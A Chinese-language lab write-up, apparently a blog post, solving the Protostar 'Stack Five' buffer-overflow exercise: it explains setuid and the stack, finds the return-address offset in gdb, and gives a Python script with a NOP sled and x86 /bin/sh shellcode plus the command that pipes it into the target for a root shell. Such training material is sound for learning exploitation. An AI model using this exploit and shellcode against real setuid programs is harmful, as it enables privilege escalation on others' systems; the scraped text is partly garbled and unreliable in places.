网站为什么要seo?,wordpress主题赚钱,网站怎么添加栏目,网站备案号 信息前言
这是一个系列文章#xff0c;之前已经介绍过一些二进制安全的基础知识#xff0c;这里就不过多重复提及#xff0c;不熟悉的同学可以去看看我之前写的文章
二进制安全虚拟机Protostar靶场 安装,基础知识讲解,破解STACK ZERO
https://blog.csdn.net/qq_45894840/artic…
前言
这是一个系列文章之前已经介绍过一些二进制安全的基础知识这里就不过多重复提及不熟悉的同学可以去看看我之前写的文章
二进制安全虚拟机Protostar靶场 安装,基础知识讲解,破解STACK ZERO
https://blog.csdn.net/qq_45894840/article/details/129490504?spm1001.2014.3001.5501二进制安全虚拟机Protostar靶场2基础知识讲解栈溢出覆盖变量 Stack One,Stack Two
https://blog.csdn.net/qq_45894840/article/details/132688653?spm1001.2014.3001.5501二进制安全虚拟机Protostar靶场3溢出控制程序指针基础知识讲解 Stack Three,Stack Four
https://blog.csdn.net/qq_45894840/article/details/132720953?spm1001.2014.3001.5501Stack Five
程序静态分析
https://exploit.education/protostar/stack-five/#include stdlib.h
#include unistd.h
#include stdio.h
#include string.hint main(int argc, char **argv)
{char buffer[64];gets(buffer);
}这个程序很简单只有两行作用只是接受我们的输入
setuid
什么是setuid
setuid代表设置用户身份并且setuid设置调用进程的有效用户ID用户运行程序的uid与调用进程的真实uid不匹配这么说起来有点绕我们来举一个例子
一个要以root权限运行的程序但我们想让普通用户也能运行它但又要防止该程序被攻击者利用这里就需要用的setuid了演示 我们用user用户运行一个vim 然后新开一个窗口查看后台进程
ps -aux这里可以看到我们的vim正在以user的权限运行中然后我们去执行一下靶机上的setuid文件看看 这里可以看到我们虽然是user用户但执行文件后文件正以root权限运行 我们查看文件的权限 r代表读w代表写x代表执行那s是什么呢
s替换了以x的可执行文件这被称为setuid位根据刚刚的操作应该知道了s是做什么的当这个位被user权限的用户执行时linux实际上是以文件的创造者的权限运行的在这种情况下它是以root权限运行的 我们的目标就是破解这些文件然后拿到root权限
什么是栈
可以把栈想象成一个堆积的书本你可以把新的书本放在最顶部也可以取出最顶部的书本。
当程序执行时它会使用栈来跟踪函数调用和变量的值。每次你调用一个函数计算机会在栈上创建一个新的“帧”就像书本一样用来存储这个函数的局部变量和执行时的一些信息。当函数执行完毕时这个帧会被从栈上移除就像取出一本书本一样。
栈通常是“后进先出”的这意味着最后放入栈的数据会最先被取出。这是因为栈的操作是非常快速和高效的所以它经常用于管理函数调用和跟踪程序执行流程
为什么要覆盖ret返回地址
覆盖 ret 返回地址是一种计算机攻击技巧攻击者利用它来改变程序执行的路径。这个过程有点像将一个路标或导航指令替换成你自己的指令以便程序执行到你想要的地方。
想象一下你在开车时遇到一个交叉路口路标告诉你向左拐才能到达目的地。但是攻击者可能会悄悄地改变路标让你误以为需要向右拐。当你按照这个伪装的路标行驶时你最终会到达攻击者想要的地方而不是你本来的目的地。
在计算机中程序执行的路径通常是通过返回地址控制的这个返回地址告诉计算机在函数执行完毕后应该继续执行哪里的代码。攻击者可以通过修改这个返回地址迫使程序跳转到他们指定的地方通常是一段恶意代码而不是正常的程序代码
获取ret返回地址
使用gdb打开程序在执行leave指令的地方下一个断点 运行程序随便输入一些字符然后查看栈状态
x/100wx $esp另外开一个远程连接界面使用gdb打开程序在执行ret指令的地方下一个断点 在第二个终端界面运行程序随便输入一些字符然后执行ret指令查看程序跳转的地址 根据计算我们需要80个字符就能完全覆盖ret的返回地址然后再将我们的shellcode放到控制数据的堆栈里 nop指令
NOP指令是一种特殊的机器指令它在计算机中执行时不做任何操作。简单来说NOP指令是一种“空操作”它不改变计算机的状态、不影响寄存器的值也不执行任何计算或跳转
为了防止我们shellcode收到干扰我们在shellcode代码前添加一些nop指令即可
脚本编写
import structpadding A * 76
eip struct.pack(I,0xbffff7c0)
nopnop \x90*64
payload \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x88print paddingeipnopnoppayload首先设置一个76位的垃圾字符然后利用struct模块的pack功能作用是将一个无符号整数I 表示无符号整数转换为二进制数据跳转到控制数据的栈里最后写入nop指令和shellcode代码shellcode代码可以在这个网站里找到
http://shell-storm.org/shellcode/files/shellcode-811.html这是一个linux x86架构执行/bin/sh的shellcode
如果我们直接运行脚本是得不到/bin/sh的 其实/bin/sh已经执行了只是没有输入我们可以用cat命令来重定向到标准输入输出 (python stack5exp.py ; cat) | /opt/protostar/bin/stack5成功破解程序
